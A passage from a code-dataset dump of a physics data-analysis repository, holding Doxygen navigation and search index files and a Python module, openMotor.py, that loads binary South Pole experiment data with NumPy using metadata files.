\":[2,0,9,5],\n\"SPfuncs_8py.html#abeb96363789885a36812850590fbfbab\":[2,0,9,42],\n\"SPfuncs_8py.html#aca5c571c3ee666190d0568fbcd72f1a9\":[2,0,9,18],\n\"SPfuncs_8py.html#acb6d178d4325b6c3d8fec4f8197d6819\":[2,0,9,16],\n\"SPfuncs_8py.html#adb6ea3b115ad55320acf0ef8f3ee76eb\":[2,0,9,1],\n\"SPfuncs_8py.html#ae11ccbd488015737fccc78456a5a112f\":[2,0,9,33],\n\"SPfuncs_8py.html#ae33ce81936d04fd605560ec75ffe4a12\":[2,0,9,26],\n\"SPfuncs_8py.html#ae43119e40ee34e8e5f67a1088548adb6\":[2,0,9,22],\n\"SPfuncs_8py.html#ae6715e84e2c13a885096710a851aba3a\":[2,0,9,45],\n\"SPfuncs_8py.html#ae90ba18ae292290722e197cf242d8721\":[2,0,9,7],\n\"SPfuncs_8py.html#aefa37b595edec764011c69c3202787f6\":[2,0,9,2],\n\"SPfuncs_8py.html#af195e86c16fec9d60d1ac20dbe5d1f19\":[2,0,9,27],\n\"SPfuncs_8py.html#af8a48b74a6d4e725e2409329126076a6\":[2,0,9,8],\n\"SPfuncs_8py.html#afac5173c60ef10bac3b5eafb40f7efef\":[2,0,9,20],\n\"SPfuncs_8py_source.html\":[2,0,9],\n\"SPgraphs_8py.html\":[2,0,10],\n\"SPgraphs_8py.html#a04e4e5bc22270694ea4fbca149c08f09\":[2,0,10,28],\n\"SPgraphs_8py.html#a0b2bbf659ee5ec02aa5cb7daad91c280\":[2,0,10,9],\n\"SPgraphs_8py.html#a0c498d7244fa703a63be3bb92d8b9a04\":[2,0,10,27],\n\"SPgraphs_8py.html#a16e1ef7ee56ff5db216016a0a60cc909\":[2,0,10,7],\n\"SPgraphs_8py.html#a25db38c12dcefd76294477b9cd9eaf77\":[2,0,10,25],\n\"SPgraphs_8py.html#a3308a4df9ead1d33bd7d39b4f686e118\":[2,0,10,26],\n\"SPgraphs_8py.html#a3ec55dabf6134d7fff5d974ff35af920\":[2,0,10,18],\n\"SPgraphs_8py.html#a411259eb0330302f50db7c7f60330289\":[2,0,10,10],\n\"SPgraphs_8py.html#a4d2979e542eb057ea841c0405afdc762\":[2,0,10,22],\n\"SPgraphs_8py.html#a629861d51c67e4ca35a7812367b67734\":[2,0,10,12],\n\"SPgraphs_8py.html#a697fa8b8c89c0679ddea4fe27fa68714\":[2,0,10,21],\n\"SPgraphs_8py.html#a69817958c436311d169582bdc6f2c5cf\":[2,0,10,4],\n\"SPgraphs_8py.html#a7b29c4cfd4985b53c2ee0a982eec3760\":[2,0,10,20],\n\"SPgraphs_8py.html#a7c2c5cf3d0cd43b5b3cd9876f30fd51f\":[2,0,10,17],\n\"SPgraphs_8py.html#a7ee3da3bf8fa5dbbe668d1ec1417b62f\":[2,0,10,23],\n\"SPgraphs_8py.html#a898320c98ec7a312c6a1d746636ec0be\":[2,0,10,3],\n\"SPgraphs_8py.html#aa915e36691f2aa1531d635c703e12d00\":[2,0,10,11],\n\"SPgraphs_8py.html#aa9ac03de8263ce020d5549a803aa2ec6\":[2,0,10,1],\n\"SPgraphs_8py.html#ab6f44a36f6d42154485b43e73c4eccf2\":[2,0,10,16],\n\"SPgraphs_8py.html#ac4784095475c5528bbf7b16553e32f69\":[2,0,10,13],\n\"SPgraphs_8py.html#ac48db354437f1d670e7f339066acd8e3\":[2,0,10,15],\n\"SPgraphs_8py.html#ac4f9ba0c7d5b5bfadded9af98ee6890c\":[2,0,10,5],\n\"SPgraphs_8py.html#ac526cfdccd3db288e299b42806782f66\":[2,0,10,0],\n\"SPgraphs_8py.html#ac63344d1aeb7aa62c61dd21af0bb093d\":[2,0,10,19],\n\"SPgraphs_8py.html#ad12531edaf503e50679f06d185f67f3b\":[2,0,10,14],\n\"SPgraphs_8py.html#ad33224264e0377c3a57e53584e4c57e3\":[2,0,10,8],\n\"SPgraphs_8py.html#ae5d9b9902d318a31b3eb63b2063417de\":[2,0,10,6],\n\"SPgraphs_8py.html#ae66d67a1bdf6628e901a61a60a2ed75e\":[2,0,10,2],\n\"SPgraphs_8py.html#aebd49435534649c324ad4143d7f92a34\":[2,0,10,24],\n\"SPgraphs_8py_source.html\":[2,0,10],\n\"____init_____8py.html\":[2,0,0],\n\"____init_____8py_source.html\":[2,0,0],\n\"annotated.html\":[1,0],\n\"classes.html\":[1,1],\n\"classobject.html\":[1,0,1],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html\":[1,0,0,0,0,0,7,0],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a0792732403840d5f03968b1888fa42d6\":[1,0,0,0,0,0,7,0,46],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a0c87af10688edd55eb0aea229e5979bb\":[1,0,0,0,0,0,7,0,33],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a0e6950849790e5787695a807f45b0d51\":[1,0,0,0,0,0,7,0,28],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a14656e508d81193e8c71c09d9444e15f\":[1,0,0,0,0,0,7,0,29],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a1e4c1d502ec5ff9a57bf9a330a318a54\":[1,0,0,0,0,0,7,0,26],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a1f51629896a09eb4e5d3c09c44b4823b\":[1,0,0,0,0,0,7,0,16],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a27aa119d0f7a644bb2ca116a89daee82\":[1,0,0,0,0,0,7,0,42],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a2b09966d9ad35b39ea13988a7c361df6\":[1,0,0,0,0,0,7,0,22],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a2e98e78e34f1dabc50fa44aa6a96d6f2\":[1,0,0,0,0,0,7,0,18],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a2ffa7a6de1e0ebd8172db800621eed20\":[1,0,0,0,0,0,7,0,27],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a33ced34e094ccfd1e3891b92478613e7\":[1,0,0,0,0,0,7,0,6],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a3624263a6738178d243635889b719a90\":[1,0,0,0,0,0,7,0,35],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a3a649b10dc80a63cbbb7ed141f90519f\":[1,0,0,0,0,0,7,0,12],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a5343a59b34ffebfc31c1dfd06ddfa889\":[1,0,0,0,0,0,7,0,32],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a5aad808c592bfdbb665105df2947610f\":[1,0,0,0,0,0,7,0,31],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a5ad35e931371981e41221502928547d5\":[1,0,0,0,0,0,7,0,5],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a5b12a3d9fdb93ccbf79a6b7a7893be3f\":[1,0,0,0,0,0,7,0,7],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a6478ef339e0e44839e478fec7340c6b0\":[1,0,0,0,0,0,7,0,20],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a672b7a8c57a535e8c91a4c106283d3a9\":[1,0,0,0,0,0,7,0,8],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a6e2d1324af2938ac6b23d63d9f8a89c7\":[1,0,0,0,0,0,7,0,44],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a6e8c2848a25079fc869ab950445213b8\":[1,0,0,0,0,0,7,0,36],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a6f2c3de2aa708d686f5835f10e2d096d\":[1,0,0,0,0,0,7,0,17],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a7482cde5c58c574e2c1ade31e06fcdb4\":[1,0,0,0,0,0,7,0,2],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a76a1caf7a18e9170cbce324d1be0b837\":[1,0,0,0,0,0,7,0,40],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a8250ad2059e08940bf8cd519c30e7a04\":[1,0,0,0,0,0,7,0,43],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a840bb6c513576d34e4f44299a4ca2046\":[1,0,0,0,0,0,7,0,30],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a888b03e4e0141101e71ebd9f46eb494b\":[1,0,0,0,0,0,7,0,38],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a8f689441aa1ded0237cabae51f95954f\":[1,0,0,0,0,0,7,0,15],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a9eac955cac12a62b72d189aa80b82ec6\":[1,0,0,0,0,0,7,0,10],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#a9eef53392c7e7ad757cefde737a6cb69\":[1,0,0,0,0,0,7,0,14],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#aa0b687b3c937bfb4aa71c4a09cac5eb5\":[1,0,0,0,0,0,7,0,11],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#aa2465f64a4035369a0d2a5f0b86d39fa\":[1,0,0,0,0,0,7,0,37],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#aa287beda17e46a3969a9321e5904eaed\":[1,0,0,0,0,0,7,0,4],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#aa400ad81219e782fe2e29e852b20bb28\":[1,0,0,0,0,0,7,0,9],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ab6db3c53a18a01fec96f0973c394702a\":[1,0,0,0,0,0,7,0,45],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#abc9d3a3ec4d2c9631244078690bfbee6\":[1,0,0,0,0,0,7,0,0],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ac0df54b82a9e993d707f0dafd87a19dd\":[1,0,0,0,0,0,7,0,13],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ac55c6ccc03634d3f670f52e89188779c\":[1,0,0,0,0,0,7,0,34],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#accbfa0185d4e416038e688fc9b55575b\":[1,0,0,0,0,0,7,0,23],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#acf495c99c803a2a1e23cdaeae34da985\":[1,0,0,0,0,0,7,0,25],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ae16a2ee209ef5a9dbc5d9634b3bc6fef\":[1,0,0,0,0,0,7,0,39],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ae9f5e533c3e8e9cd46cc8471ef58c2dd\":[1,0,0,0,0,0,7,0,41],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#aee6249fe272c46f07d0f2f32f6c188d2\":[1,0,0,0,0,0,7,0,1],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#af0f40f6c14b1ba1c8de9351a839eb511\":[1,0,0,0,0,0,7,0,3],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#af17c964467367b46a56c14a8c87e84a2\":[1,0,0,0,0,0,7,0,24],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#af6af62c7de4f7bc8f2dd223d05cf2b07\":[1,0,0,0,0,0,7,0,21],\n\"classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#afe54eeb9f41f503dc478557e4ea2c62a\":[1,0,0,0,0,0,7,0,19],\n\"convert_8py.html\":[2,0,1],\n\"convert_8py.html#a98b540877656803471dddb9a87fce779\":[2,0,1,0],\n\"convert_8py.html#af9f80b1ee66d98e05cf941352cdda54d\":[2,0,1,1],\n\"convert_8py_source.html\":[2,0,1],\n\"files.html\":[2,0],\n\"functions.html\":[1,3,0],\n\"functions_func.html\":[1,3,1],\n\"functions_vars.html\":[1,3,2],\n\"getSPdata_8py.html\":[2,0,2],\n\"getSPdata_8py.html#a0a88573676ca77c114f061278e10a9e5\":[2,0,2,3],\n\"getSPdata_8py.html#a1dcdb0bd4cf5fc99ddd642fd2e7dcb7b\":[2,0,2,7],\n\"getSPdata_8py.html#a3cd7917344307847daed23d1f68575c4\":[2,0,2,6],\n\"getSPdata_8py.html#a5d2dee28b4f96a6448beb4b18e01fb24\":[2,0,2,9],\n\"getSPdata_8py.html#a98628f2f931f1936c89b4f2c90610736\":[2,0,2,4],\n\"getSPdata_8py.html#aa7e1cd1161dfd5e09ecfea09630c0395\":[2,0,2,11],\n\"getSPdata_8py.html#aadc073490775819f8e7b4eecba84d8c0\":[2,0,2,2],\n\"getSPdata_8py.html#ab7bcb6dc1e35e343ea3d5a9f790c1f42\":[2,0,2,5],\n\"getSPdata_8py.html#abf99dd1de2422300e6e0810c52e352b0\":[2,0,2,0],\n\"getSPdata_8py.html#ad0b93fd48f5d39d35267e0463a7d2e52\":[2,0,2,8],\n\"getSPdata_8py.html#af3d30f9077a6d1c700f7f691a8288334\":[2,0,2,10],\n\"getSPdata_8py.html#afcc30f10d3721c1b098ac36014f598ba\":[2,0,2,1],\n\"getSPdata_8py_source.html\":[2,0,2],\n\"hierarchy.html\":[1,2],\n\"index.html\":[],\n\"loadSPFiles_8py.html\":[2,0,3],\n\"loadSPFiles_8py.html#a1a641072729c4056f58d2f36926b21d1\":[2,0,3,1],\n\"loadSPFiles_8py.html#a39efcdddf61ee790cdf9c4dfbd9e7080\":[2,0,3,14],\n\"loadSPFiles_8py.html#a450ab2273d44a0e76443c6e31b162908\":[2,0,3,11],\n\"loadSPFiles_8py.html#a48f328dcf32e16ad58677599d39be6a1\":[2,0,3,3],\n\"loadSPFiles_8py.html#a65abcc2d7333a2e99d3d3376b616f959\":[2,0,3,13],\n\"loadSPFiles_8py.html#a7a17d807e31989fac9962e7eb5fa3de5\":[2,0,3,8],\n\"loadSPFiles_8py.html#a83183382a5277a75ee1031f6ef284691\":[2,0,3,9],\n\"loadSPFiles_8py.html#a8966ac451acc4e186f9a8c9d299da497\":[2,0,3,12],\n\"loadSPFiles_8py.html#a8ffbf3fed92bc26b4248caebb30ade38\":[2,0,3,18],\n\"loadSPFiles_8py.html#a9058f0ead0c926f493bb7f6ae52a49ea\":[2,0,3,16],\n\"loadSPFiles_8py.html#a92ba966a3b7423fd4d0c7874d3f92e71\":[2,0,3,21],\n\"loadSPFiles_8py.html#a931d7ee8b1015ac25cbca6eee1f77bea\":[2,0,3,19],\n\"loadSPFiles_8py.html#a94905f8c986f1a826f5e14c6c271d3bc\":[2,0,3,6],\n\"loadSPFiles_8py.html#aa6876f5f9096cba233794dd03f719de3\":[2,0,3,7],\n\"loadSPFiles_8py.html#ac05316301b88456778eaedde597c8ed5\":[2,0,3,5],\n\"loadSPFiles_8py.html#acfe87f91d2373c3c41bf59a6024b8a94\":[2,0,3,15],\n\"loadSPFiles_8py.html#ad67a85b681c64920ca3d127dcbb8693a\":[2,0,3,2],\n\"loadSPFiles_8py.html#ad96607a97fb1364b1b8f5a96a6537818\":[2,0,3,0],\n\"loadSPFiles_8py.html#aed6d44730b91f4104569281ef51b335d\":[2,0,3,10],\n\"loadSPFiles_8py.html#af4aa2bb0015793d7b7e493e4aa4f4b8c\":[2,0,3,20],\n\"loadSPFiles_8py.html#af4f5d276f8094f09b7f23a7e43031b4b\":[2,0,3,4],\n\"loadSPFiles_8py.html#af897386d87d4d72567fb337653aa3105\":[2,0,3,17],\n\"loadSPFiles_8py_source.html\":[2,0,3],\n\"namespacemembers.html\":[0,1,0],\n\"namespacemembers_func.html\":[0,1,1],\n\"namespacemembers_vars.html\":[0,1,2],\n\"namespacerepo.html\":[1,0,0],\n\"namespacerepo.html\":[0,0,0],\n\"namespacerepo_1_1programs.html\":[1,0,0,0],\n\"namespacerepo_1_1programs.html\":[0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages.html\":[0,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages.html\":[1,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr.html\":[0,0,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr.html\":[1,0,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet.html\":[0,0,0,0,0,0,7],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet.html\":[1,0,0,0,0,0,7],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html\":[0,0,0,0,0,0,8],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html\":[1,0,0,0,0,0,8],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPgraphs.html\":[0,0,0,0,0,0,9],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPgraphs.html\":[1,0,0,0,0,0,9],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1convert.html\":[1,0,0,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1convert.html\":[0,0,0,0,0,0,0],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1getSPdata.html\":[0,0,0,0,0,0,1],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1getSPdata.html\":[1,0,0,0,0,0,1],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1loadSPFiles.html\":[0,0,0,0,0,0,2],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1loadSPFiles.html\":[1,0,0,0,0,0,2],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openCPT.html\":[0,0,0,0,0,0,3],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openCPT.html\":[1,0,0,0,0,0,3],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openMotor.html\":[0,0,0,0,0,0,4],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openMotor.html\":[1,0,0,0,0,0,4],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1scrap.html\":[0,0,0,0,0,0,5],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1scrap.html\":[1,0,0,0,0,0,5],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1sdtime.html\":[1,0,0,0,0,0,6],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1sdtime.html\":[0,0,0,0,0,0,6],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1test__SPfuncs.html\":[0,0,0,0,0,0,10],\n\"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1test__SPfuncs.html\":[1,0,0,0,0,0,10],\n\"namespaces.html\":[0,0],\n\"openCPT_8py.html\":[2,0,4],\n\"openCPT_8py.html#a123c419a688aefb0d6d482eca7512d36\":[2,0,4,1],\n\"openCPT_8py.html#a3e5077d300b3260fd9aa1487e0e15a3e\":[2,0,4,3],\n\"openCPT_8py.html#a6195f6525b22b29221384f9235fe1062\":[2,0,4,2],\n\"openCPT_8py.html#a629d9addea1bbee10544941d7c301ba8\":[2,0,4,4],\n\"openCPT_8py.html#a87910852db48cafc314ea9372f00a401\":[2,0,4,6]\n};\n" }, { "alpha_fraction": 0.6429715156555176, "alphanum_fraction": 0.6964457035064697, "avg_line_length": 33.70000076293945, "blob_id": "d8d406a62f38249405628dc49223181197921565", "content_id": "15db5189a7a8d37bccfbff19ece329984cbb02fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3123, "license_type": "no_license", "max_line_length": 164, "num_lines": 90, "path": "/openMotor.py", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom os import path\nimport os\nimport re\n\n\ndef loadBins(root_path, useMetaFile=True):\n\tdirname=path.dirname(root_path) \n\trootname=path.basename(root_path)\t\n\tr=re.compile('{0}( \\d+)?\\.bin'.format(rootname))\n\tdlist=os.listdir(dirname);\n\tdlist=[st for st in dlist if r.match(st)]\n\tdlist.sort( key=lambda st: int(r.match(st).groups()[0]) ) # dlist is now sorted\n\t\n\tdat_list=[loadAbin(path.join(dirname, fname), useMetaFile=useMetaFile) for fname in dlist]\n\t# Combine these into a single file...\n\n\tdat=np.hstack(dat_list)\n\t#datnames=dat_list[0].keys()\n\treturn dat\n\n\n\ndef loadAbin(filepath, nVars=1, useMetaFile=True, endian=''):\n\tif useMetaFile:\n\t\tfname_components=path.splitext(filepath)[0].split(' ')\n\t\tif fname_components[-1].isdigit():\n\t\t\tfname_components.pop()\n\t\tmeta_file_path=' '.join(fname_components) + '.npmeta'\n\t\tnpmeta_path=' '.join(fname_components) + '.npmeta'\n\t\tif path.exists(npmeta_path):\n\t\t\tmfile=open(npmeta_path)\n\t\t\tlines=mfile.readlines()\n\t\t\t#totalDataType=[line.replace(',', ' ').split() for line in lines if not line.isspace() and not line.startswith('#') ]# should be tuples of e.g. ('signal', 'f8');\n\t\t\tpairs=[line.strip().split(',') for line in lines if not line.isspace() and not line.startswith('#') ]# should be tuples of e.g. ('signal', 'f8');\n\t\t\tdefaultDtype='>f4'\n\t\t\ttotalDataType=[]\n\t\t\tfor p in pairs:\n\t\t\t\tname=p[0].strip()\n\t\t\t\tif len(p)>1:\n\t\t\t\t\tdt=p[1].strip()\n\t\t\t\t\tdefaultDtype=dt;\n\t\t\t\telse:\n\t\t\t\t\tdt=defaultDtype;\n\t\t\t\ttotalDataType.append((name, dt));\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t#print(\"totalDataType: {0}\".format(totalDataType))\n\t\telse:\n\t\t\tmeta_file_path=' '.join(fname_components) + '.meta'\n\t\t\tif path.exists(meta_file_path):\n\t\t\t\tmfile=open(meta_file_path)\n\t\t\telif path.exists(meta_file_path+'.txt'):\n\t\t\t\tmfile=open(meta_file_path+'.txt')\n\t\t\telse:\n\t\t\t\traise IOError\n\t\t\tsigNames=mfile.readlines()\n\t\t\tsigNames=[name.strip() for name in sigNames]\n\t\t\tif sigNames[0]=='Sidereal Days':\n\t\t\t\tsigNames=sigNames[1:]\n\t\t\tnVars=len(sigNames)\n\t\t\tsigDataType=[(name, endian+'f8') for name in sigNames]\n\t\t\ttimeDataType=[('sd', endian+'f8')]\n\t\t\ttotalDataType=timeDataType+sigDataType\n\n\telse:\n\t\ttimeDataType=[('sd', endian+'f8')]\n\t\tsigDataType=[('s{0}'.format(n), endian+'f8') for n in range(1,nVars+1)]\n\t\ttotalDataType=timeDataType+sigDataType\n\n\n\n\tprint(\"total dtype: {0}\".format(totalDataType))\n\tdat=np.fromfile(filepath, totalDataType)\n\n\treturn dat;\n\nif __name__==\"__main__\":\n\t#ddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5253.67 Bundle/'\n\t#fpath=ddir+'SP_motor 5253.67 sensors 8.bin'\n\tddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_aparatus 5256.38 Bundle/'\n\t#ddir='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5256.38 Bundle/'\n\tfname='SP_aparatus 5256.38 Medium 6.bin'\n\tddir2='/media/morgan/6a0066c2-6c13-49f4-9322-0b818dda2fe8/Princeton Data/South Pole/SP_motor 5253.67 Bundle/'\n\tfname2='SP_motor 5253.67 sensors'\n\tfpath=ddir+fname\n\n\tdat=loadAbin(fpath, useMetaFile=True);\n\tdat2=loadBins(ddir+'SP_aparatus 5256.38 Medium')\n\tdat3=loadBins(ddir2+fname2, useMetaFile=True)\n" }, { "alpha_fraction": 0.6398305296897888, "alphanum_fraction": 0.7262712121009827, "avg_line_length": 83.35713958740234, "blob_id": "2e993e9a302ef4e756035aecf1831d58d1eaa24e", "content_id": "8a557f375826f176e955eb2f3b651ee5e0a2084b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1180, "license_type": "no_license", "max_line_length": 157, "num_lines": 14, "path": "/html/namespacerepo_1_1programs_1_1pythonpackages_1_1pr.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var namespacerepo_1_1programs_1_1pythonpackages_1_1pr =\n[\n [ \"convert\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1convert.html\", null ],\n [ \"getSPdata\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1getSPdata.html\", null ],\n [ \"loadSPFiles\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1loadSPFiles.html\", null ],\n [ \"openCPT\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openCPT.html\", null ],\n [ \"openMotor\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openMotor.html\", null ],\n [ \"scrap\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1scrap.html\", null ],\n [ \"sdtime\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1sdtime.html\", null ],\n [ \"SPDataSet\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet.html\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet\" ],\n [ \"SPfuncs\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html\", null ],\n [ \"SPgraphs\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPgraphs.html\", null ],\n [ \"test_SPfuncs\", \"namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1test__SPfuncs.html\", null ]\n];" }, { "alpha_fraction": 0.5389610528945923, "alphanum_fraction": 0.5779221057891846, "avg_line_length": 29.799999237060547, "blob_id": "782b8bc4ba31c8ef27544988517d604d3da3b0d7", "content_id": "b3ad0c6ad0f368c347b200123c7de77e555f651a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 154, "license_type": "no_license", "max_line_length": 68, "num_lines": 5, "path": "/html/search/files_4.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['opencpt_2epy',['openCPT.py',['../openCPT_8py.html',1,'']]],\n ['openmotor_2epy',['openMotor.py',['../openMotor_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.6550925970077515, "alphanum_fraction": 0.7754629850387573, "avg_line_length": 85.4000015258789, "blob_id": "90d5d8817df90c0bd8fd8bb843e82f438b4bdcd9", "content_id": "4b6b83907a0e42476a2ee732618681acc235d39e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 432, "license_type": "no_license", "max_line_length": 213, "num_lines": 5, "path": "/html/search/variables_1.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['caloverride',['calOverride',['../classrepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPDataSet_1_1SPDataSet.html#ae16a2ee209ef5a9dbc5d9634b3bc6fef',1,'repo::programs::pythonpackages::pr::SPDataSet::SPDataSet']]],\n ['correlationdata',['CorrelationData',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html#a97ee543cf8ac7b27443cbfe8ff2e20f3',1,'repo::programs::pythonpackages::pr::SPfuncs']]]\n];\n" }, { "alpha_fraction": 0.4771573543548584, "alphanum_fraction": 0.7360405921936035, "avg_line_length": 64.73332977294922, "blob_id": "ecb0648266a383fc44b3670b758ecc178db5388e", "content_id": 